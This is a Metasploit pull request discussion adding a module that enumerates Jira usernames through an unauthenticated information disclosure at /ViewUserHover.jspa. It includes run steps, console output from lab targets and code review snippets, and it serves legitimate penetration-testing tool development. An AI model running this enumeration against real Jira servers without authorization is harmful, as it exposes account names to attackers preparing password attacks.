Add Jira Username Enumerator
rapid7/metasploit-framework pull request #14631
Opened 2021-01-18 17:10 UTC by Halbachb

## Description

  This module exploits an information disclosure vulnerability that allows an unauthenticated user to enumerate users in the /ViewUserHover.jspa endpoint. on a Jira server
  This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
  Discovered by Mikhail Klyuchnikov @__mn1__
  https://twitter.com/ptswarm/status/1318914772918767619

## Vulnerable Application

  [Jira](https://www.atlassian.com/software/jira) Jira is team managment software for agile teams.

  This module has been tested successfully on:

   * Jira version 8.4.1 on Ubuntu Linux.
   * Jira version 8.4.1 on Kali Linux.

  Installers:

  * [Jira Installers](https://www.atlassian.com/software/jira/core/updateatlassian-jira-software-8.4.1.tar.gz)
  * [Jira Installers Archive] (https://www.atlassian.com/software/jira/download-archives)

## Verification Steps

  1. Start `msfconsole`
  2. Do: `use auxiliary/scanner/http/jira_user_enum`
  3. Do: `set rhosts [IP]`
  4. Do: `set SSL true`
  5. Do: `set RPORT 443`
  6. Do: `set USERNAME <username to test>
  7. Do: `run`
  8. You should find out if the user exists or not

## Scenarios

  ```
  msf6 > use auxiliary/scanner/http/jira_enum_users 
  msf6 auxiliary(scanner/http/jira_enum_users) > set rhosts 192.168.0.101
  rhosts => 192.168.0.101
  msf6 auxiliary(scanner/http/jira_enum_users) > set USERNAME admin
  msf6 auxiliary(scanner/http/jira_enum_users) > run
  [*] Begin enumerating users at 192.168.0.101/secure/ViewUserHover.jspa?username=
  [*] checking user admin
  [+] 'User exists: admin'
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf6 auxiliary(scanner/http/jira_enum_users) > creds
  Credentials
  ===========
  host           origin         service         public   private  realm  private_type  JtR Format
  ----           ------         -------         ------   -------  -----  ------------  ----------
  192.168.0.101  192.168.0.101  443/tcp (jira)  admin                                
  ```

2021-01-19 17:35 UTC, Halbachb commented
I am still new to GIT and ruby development. Please let me know if there is anything I am missing.

2021-01-19 18:26 UTC, jmartin-r7 requested changes
Credential reporting can be simplified significantly.  Suggestions provided will require testing. The `service_details` method is provided by `Msf::Exploit::Remote::HttpClient`.

2021-01-19 18:26 UTC, jmartin-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +  end
```suggestion
```

This method is not needed.

2021-01-19 18:26 UTC, jmartin-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +        )
```suggestion
      connection_details = {
          module_fullname: self.fullname,
          username: user,
          workspace_id: myworkspace_id,
          status: Metasploit::Model::Login::Status::UNTRIED
      }.merge(service_details)
      create_credential_and_login(connection_details)
```

2021-01-19 19:18 UTC, Halbachb commented
I tested the changes on Ubuntu Linux against Jira Server 8.4.1 and it works 
![2021-01-19](https://user-images.githubusercontent.com/23404532/105082172-cb568900-5a58-11eb-878c-b6fbe3c3ff68.png)

2021-01-19 21:46 UTC, jmartin-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +  end
It would be preferred to see this parsed using built in utilities, consider looking into how using the `AuthBrute` mixin could aid in this parsing.

```
include Msf::Auxiliary::AuthBrute
```

2021-01-21 15:35 UTC, acammack-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +  end
If we use that mixin, we could use `load_user_vars.each` below instead of having this method, though we would need to take care to de-register most of the datastore options that get pulled in for `AuthBrute`.

2021-01-21 18:10 UTC, Halbachb commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +  end
I was able to make it work using the `AuthBrute` mixin and de-registering the options that are not used. I followed the `tomcat_enum.rb` module as an example and changed up my code to look similar.

2021-01-25 23:47 UTC, jmartin-r7 requested changes
Thanks for refactoring to use common user enumeration code.  I have added a few minor comments and noticed the reporting now looks like it will store the username credentials incorrectly when more than one user is successfully detected.

2021-01-25 23:47 UTC, jmartin-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +    create_credential_and_login(connection_details)
Credential reporting should be moved into `do_user_enum` reporting the whole list or found users as a single credential is not the desired function.

2021-01-28 21:32 UTC, Halbachb commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +      print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(', ')}")
I changed this so it reports both the number of users found and then lists those users.

2021-01-28 21:33 UTC, Halbachb commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +    create_credential_and_login(connection_details)
I moved the credential reporting to the do_user_enum method, but it was still not acting as desired. I tried to change the code but it was still reporting the whole list of users. I decided to remove the call to the create_credential_and_login since this module technically only finds usernames and not whole sets of credentials.

2021-01-28 22:59 UTC, jmartin-r7 reviewed
Reporting the users should be the primary goal for using this module.  By only printing to the console a lot of value is lost.  A possible solution to report each credential as identified is offered here.

2021-01-28 22:59 UTC, jmartin-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +      print_good("'User exists: #{user}'")
```suggestion
      connection_details = {
        module_fullname: fullname,
        username: user,
        workspace_id: myworkspace_id,
        status: Metasploit::Model::Login::Status::UNTRIED
      }.merge(service_details)
      create_credential_and_login(connection_details)
      print_good("'User exists: #{user}'")
```
I believe this should work to store the usernames as credentials in the database.

2021-02-12 17:56 UTC, cdelafuente-r7 reviewed
Thanks for this great first contribution @Halbachb! This is very well written and works well. I left a few comments for you to review before it lands. Please, let me know if you have any questions.

2021-02-12 17:56 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +        'Author' => [ 'Brian Halbach' ],
It is a good idea to also give credits to who discovered the vulnerability or wrote the PoC, and add a comment saying who did what. Here is an example: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb#L26-L29

2021-02-12 17:56 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +    deregister_options('PASS_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'STOP_ON_SUCCESS', 'BLANK_PASSWORDS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'PASSWORD')
I would keep the `DB_ALL_USERS` option enabled. When set to `true`, it tells the scanner to also use any username present in the database, which can be very useful.

That said, this feature has a bug and it's been fixed in this [PR](https://github.com/rapid7/metasploit-framework/pull/14748). So, you will have to apply this fix first, or wait for this PR to be merged, if you want to test this functionality.

```
msf6 auxiliary(scanner/http/jira_user_enum) > creds add user:test2
msf6 auxiliary(scanner/http/jira_user_enum) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------
                       test2

msf6 auxiliary(scanner/http/jira_user_enum) > options

Module options (auxiliary/scanner/http/jira_user_enum):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             8080             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Jira Path
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          test1            no        A specific username to authenticate as
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf6 auxiliary(scanner/http/jira_user_enum) > set DB_ALL_USERS true
DB_ALL_USERS => true
msf6 auxiliary(scanner/http/jira_user_enum) > run

[*] Begin enumerating user at 127.0.0.1/secure/ViewUserHover.jspa?username=
[*] checking user test1
[+] 'User exists: test1'
[*] Begin enumerating user at 127.0.0.1/secure/ViewUserHover.jspa?username=
[*] checking user test2
[+] 'User exists: test2'
[+] 2 Users found: test1, test2
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

2021-02-12 17:56 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +    @base_uri ||= normalize_uri("#{target_uri.path}/secure/ViewUserHover.jspa?username=")
I think the URI should not contain the URL parameter. `vars_gets` option should be used in `send_request_cgi!` instead (see my other comment).
```suggestion
    @base_uri ||= normalize_uri("#{target_uri.path}/secure/ViewUserHover.jspa")
```

2021-02-12 17:56 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +      'uri' => "#{base_uri}#{user}",
I would recommend to use `var_gets` instead of embedding the parameter directly into the URI. It has the benefit of automatically URL encode the parameter value if special characters are used:
```suggestion
      'uri' => "#{base_uri}",
      'vars_get' => { 'username' => user },
```

2021-02-12 17:56 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +    elsif res.body.include?('<a id="avatar-full-name-link"') # this works for 8.4.1 not sure about other verions
That would be interesting to test with other Jira versions and add detection methods to have a better coverage for this exploit. It is pretty easy to install a specific version using docker:
```
docker run --name="jira" -d -p 8080:8080 atlassian/jira-software:8.11
```

2021-02-12 17:56 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +      do_user_enum(user)
If the operator chooses to use a file containing usernames (`USER_FILE` option) instead of testing users one by one with the `USERNAME` option. The empty user `""` will still be tested:
```
msf6 auxiliary(scanner/http/jira_user_enum) > cat users.txt
[*] exec: cat users.txt

fake_user
test1
msf6 auxiliary(scanner/http/jira_user_enum) > options

Module options (auxiliary/scanner/http/jira_user_enum):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             8080             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Jira Path
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USER_FILE         users.txt        no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf6 auxiliary(scanner/http/jira_user_enum) > run

[*] Begin enumerating user at 127.0.0.1/secure/ViewUserHover.jspa?username=
[*] checking user
[-] 'User  does not exist'
[*] Begin enumerating user at 127.0.0.1/secure/ViewUserHover.jspa?username=
[*] checking user fake_user
[-] 'User fake_user does not exist'
[*] Begin enumerating user at 127.0.0.1/secure/ViewUserHover.jspa?username=
[*] checking user test1
[+] 'User exists: test1'
[+] 1 Users found: test1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

I think a test should be added here to avoid this.

2021-02-12 17:56 UTC, cdelafuente-r7 commented on documentation/modules/auxiliary/scanner/http/jira_user_enum.md
> +  This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
I verified and it works fine with Jira version 8.4.1. However, I tested against Jira version 8.11.1, which should be an affected version, and it doesn't seems to work:

![Screen Shot 2021-02-12 at 17 46 52](https://user-images.githubusercontent.com/56716719/107796634-60982500-6d5a-11eb-9be0-1f9170d7db5d.png)
```
msf6 auxiliary(scanner/http/jira_user_enum) > options

Module options (auxiliary/scanner/http/jira_user_enum):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             8081             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Jira Path
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          test1            no        A specific username to authenticate as
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf6 auxiliary(scanner/http/jira_user_enum) > run

[*] Begin enumerating user at 127.0.0.1/secure/ViewUserHover.jspa?username=
[*] checking user test1
[-] No Response From Server
[-] 127.0.0.1:8081 - [1/1] - Bruteforce cancelled against this service.
[*] http://127.0.0.1:8081/ - No users found.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

2021-02-12 17:56 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +    @users_found = {}
Is there any benefit of using a hash instead of a simple array?
```suggestion
    @users_found = []
```
Then, just add the user found in `do_user_enum `
```
    @users_found << user
```
and print the result this way:
```
    print_good("#{@users_found.length} Users found: #{@users_found.sort.join(', ')}")
```

2021-02-12 17:56 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +      # create
```suggestion
```

2021-03-09 20:23 UTC, Halbachb commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +        'Author' => [ 'Brian Halbach' ],
I updated the author info to be similar to https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/fileformat/libreoffice_logo_exec.rb#L26-L29

2021-03-11 10:59 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +        'Author' => [ 'Brian Halbach' ],
Thanks for updating this. There is a typo (missing comma) in the `Author` section, which makes our checks fail. Here is how it should be:
```ruby
        'Author' =>
          [
            'Brian Halbach', # msf module author
            'Mikhail Klyuchnikov' # initial discovery and PoC
          ],
```

2021-03-11 11:00 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +    deregister_options('PASS_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'STOP_ON_SUCCESS', 'BLANK_PASSWORDS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'PASSWORD')
I believe https://github.com/rapid7/metasploit-framework/pull/14748 has been merged and `DB_ALL_USERS` can be enabled again.

2021-03-11 11:10 UTC, cdelafuente-r7 commented on documentation/modules/auxiliary/scanner/http/jira_user_enum.md
> +## Description
Thanks for updating the documentation. From our [module_doc_template.md](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md) I think the options are supposed to use header level 3.

```
### BRUTEFORCE_SPEED

How fast to bruteforce, from 0 to 5.

etc...
```

Also, options such as RHOSTS, RPORT, etc. are common enough that they can be omitted. `tools/dev/msftidy_docs.rb` will actually [call out](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/msftidy_docs.rb#L244-L247) these universal options as not needing to be documented.

2021-03-17 17:51 UTC, Halbachb commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +    deregister_options('PASS_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'STOP_ON_SUCCESS', 'BLANK_PASSWORDS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'PASSWORD')
I enabled DB_ALL_USERS, and initial testing worked for me. Sorry, I have been so slow to respond, I am in the middle of my OSCP but will make and test more changes soon.

2021-04-02 10:27 UTC, cdelafuente-r7 commented on modules/auxiliary/scanner/http/jira_user_enum.rb
> +      'uri' => "#{base_uri}",
`rubocop` is complaining about this line and it breaks our checks.
```suggestion
      'uri' => base_uri.to_s,
```
I noticed your branch is based on an old version of master and that's why you probably only see these `rubocop` errors after pushing the code. You can rebase your branch on an up-to-date `master` to make sure the git hooks are running against the most recent rules.

2021-05-24 12:59 UTC, smcintyre-r7 commented
Hey @Halbachb it looks like this module is pretty close to being ready to go but there are still a few more comments left by the reviewers. I'd like to get this merged in or attic'ed in the next few weeks if we can. Thanks!

2021-09-15 14:42 UTC, space-r7 commented
Made the remaining changes and also tried testing version 8.11.1. `8.11.0`, `8.10.0`, and `8.5.6` worked when I tested those versions:

`v8.5.6`

```
msf6 auxiliary(scanner/http/jira_user_enum) > run

[*] Begin enumerating users at 192.168.140.135/secure/ViewUserHover.jspa
[*] Checking user 'admin'
[+] User exists: 'admin'
[*] Checking user 'blah'
[+] User exists: 'blah'
[*] Checking user 'user'
[-] User 'user' does not exist
[*] Checking user 'batman'
[-] User 'batman' does not exist
[*] Checking user 'random_user'
[-] User 'random_user' does not exist
[*] Checking user 'stuff'
[-] User 'stuff' does not exist
[+] 2 Users found: admin, blah
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

2021-09-15 15:24 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2021-09-15 17:38 UTC, merged

2021-09-15 17:41 UTC, space-r7 commented
In c15193722603d8475142bfc52f71277d37dbaa77, I updated the Jira versions tested and vulnerable versions to reflect that this module does not work against `v8.11.1` despite the advisory reporting that it's also vulnerable.

2021-09-15 17:43 UTC, space-r7 commented
## Release Notes

This obtains user names on Jira Server by exploiting an information disclosure vulnerability that exists at the `/ViewUserHover.jspa` endpoint.